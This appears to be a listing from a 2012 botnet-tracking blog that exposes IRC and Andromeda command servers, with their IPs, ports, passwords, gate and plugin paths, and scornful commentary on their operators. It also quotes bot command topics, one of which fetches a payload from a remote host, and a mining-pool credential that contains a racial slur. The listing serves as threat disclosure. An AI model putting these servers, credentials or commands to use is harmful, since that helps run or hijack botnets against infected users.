Resolved i.greenleafyplants.info to 37.221.170.211 Server: i.greenleafyplants.info Port: 15001 Server password: 69 Channel: #A Channel password: t Nick format: _[USA|U|L|WIN7|x64|4c]alcaiwfs Oper: _ [_] (u@v.Host): … [_] @#A [_] irc.server.net :IRC server [_] is a Bot on IRC server [_] idle 01:22:14, signon: Sun Dec 02 05:45:11 [_] End of WHOIS list. His debug bot: n[USA|U|D|WIN7|x64|4c]xqftcbqiRead more...
w4hw5wg3488h.net (snk asper mod irc botnet hosted by Germany Karlsruhe 1&1 Internet Ag)
Resolved w4hw5wg3488h.net to 213.165.89.117 Server: w4hw5wg3488h.net Port: 5050 Channel: #oh Topic for #oh is: .d /100/97/111/124/120/46/47/39/99/103/96/69/126/115/101/62/113/111/115/62/100/124/57/61/39/57/60/23/40/61/47/33/12/63/52/35/42/41/17/103/8/85/63/104/127/118/39/98/107/73/77/ Topic for #oh set by s at Sat Dec 01 18:36:05 2012 Oper: s!x@x Talking with snk <Userbased> hey <s> sup <Userbased> cool ircd mod <s> yea <Userbased> I like the link encryption as well <Userbased> is this anRead more...
new.najd.us (irc botnet hosted by Finland Espoo Csc – Tieteen Tietotekniikan Keskus Oy)
Resolved new.najd.us to 193.166.255.170 Server: new.najd.us Port: 7000 Server password: hipass Nick format: yhrhjz I don’t know the channels as I don’t have the binary. Hosting infos: http://whois.domaintools.com/193.166.255.170
dinosaur.no-ip.org (Andromeda and barracuda http botnets hosted by Russian Federation Moscow Pallada Web Service Llc)
Resolved dinosaur.no-ip.org to 37.0.123.119 I’ve been watching the barracuda for a while, and when I saw it load the andromeda I decided to post them both. Andromeda Server: dinosaur.no-ip.org Gate file: /andr/image.php Plugins Rootkit: dinosaur.no-ip.org/andr/r.pack Socks: dinosaur.no-ip.org/andr/s.pack Formgrabber: dinosaur.no-ip.org/andr/f.pack Gate file: dinosaur.no-ip.org/andr/fg.php Barracuda http Server: dinosaur.no-ip.org Gate file: dinosaur.no-ip.org/drgordon512/bot.php Here are someRead more...
freshairhosting.nl (Andromeda http botnet hosted by Thailand Bangkok Metrabyte Th)
Resolved freshairhosting.nl to 119.59.99.200 When will these skids finally get tired of andromeda? Server: freshairhosting.nl Gate file: image.php Hosting infos: http://whois.domaintools.com/119.59.99.200
213.165.89.117 (irc botnet hosted by Germany Karlsruhe 1&1 Internet Ag)
Server: 213.165.89.117 Port: 5050 Channel: #kos Nick format: [USA|XP]hjktjel This is snk’s asper mod again. Hosting infos: http://whois.domaintools.com/213.165.89.117
37.221.163.175 (Andromeda http botnet hosted by Romania Voxility S.r.l.)
The laziest skids don’t even bother getting a domain at all. Why hello Nicolas Moses. What do you have for us today? It’s andromeda again, this time hosted on a windows vps. Server: 37.221.163.175 Gate file: /andro/image.php EDIT: Oh hey, bitcoin mining. Glad to see you’re still keeping the same old password. daily500:nigger123456@pool.bitclockers.com:8332 Also aRead more...
uberchat.no-ip.biz (Andromeda http botnet hosted by Romania Voxility S.r.l.)
Resolved uberchat.no-ip.biz to 37.221.160.124 Yet another cracked andromeda. Skids don’t even bother to get a real domain for it. Server: uberchat.no-ip.biz Gate file: /chat/image.php Clicking on adf.ly links, someone’s clearly trying to make some big bucks. public void adfly() { this.WebBrowser1.Navigate("http://adf.ly/FHZcZ"); } Hosting infos: http://whois.domaintools.com/37.221.160.124
keep.hustling4life.biz (Bitcoin mining pool for botnet)
Resolved keep.hustling4life.biz to 195.190.13.138, 46.17.92.158, 213.165.85.165 Someone is trying to get some mining done before the mining reward drops I guess. The file is from an already posted botnet. * Topic for #mr is: !dl hxxp://213.165.85.165:8081/udhsdfka.png * Topic for #mr set by test at Mon Nov 26 04:52:40 2012 Server: keep.hustling4life.biz Port: 2142 Mining information:Read more...
46.166.139.177 (Andromeda http botnet hosted by Italy Florence Santrex Internet Services Ltd.)
Server: 46.166.139.177 Gate file: /Panel/image.php Plugins Rootkit: 46.166.139.177/Panel/r.pack Formgrabber: 46.166.139.177/Panel/f.pack Gate file: fg.php Hosting infos: http://whois.domaintools.com/46.166.139.177